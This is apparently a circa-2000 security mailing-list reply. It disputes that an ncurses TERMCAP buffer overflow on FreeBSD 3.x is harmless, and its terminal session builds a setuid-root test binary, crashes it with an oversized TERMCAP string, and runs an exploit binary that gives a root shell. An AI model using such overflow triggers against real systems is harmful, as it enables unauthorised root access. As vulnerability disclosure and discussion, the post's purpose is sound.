> Furthermore, it is not actually a vulnerability. It seems that setuid
> programs will not accept an alternate termcap file via TERMCAP even under
> the old version of ncurses in FreeBSD 3.x. Therefore this "exploit" can
> only be used on your own binaries.
Sure?
lubi:venglin:~> uname -a
FreeBSD lubi.freebsd.lublin.pl 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar 1
11:18:54 CET 2000
[EMAIL PROTECTED]:/mnt/elite/usr/src/sys/compile/GADACZKA i386
lubi:venglin:~> cat dupa.c
main() { initscr(); }
lubi:venglin:~> cc -o d dupa.c -lncurses
lubi:venglin:~> su
s/key 76 ve15188
Password:
lubi:venglin:/home/venglin# chmod 4755 d ; chown root.wheel d
lubi:venglin:/home/venglin# exit
lubi:venglin:~> ./d
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> ./d
Segmentation fault
lubi:venglin:~> ./dupaexp 4000
ret: 0xbfbfba8c
# id
uid=0(root) gid=1001(users) groups=1001(users), 0(wheel)
Obviously, *most* binaries are dropping root privileges before using any ncurses
functions.
--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: [EMAIL PROTECTED] ** PGP: D48684904685DF43 EA93AFA13BE170BF *
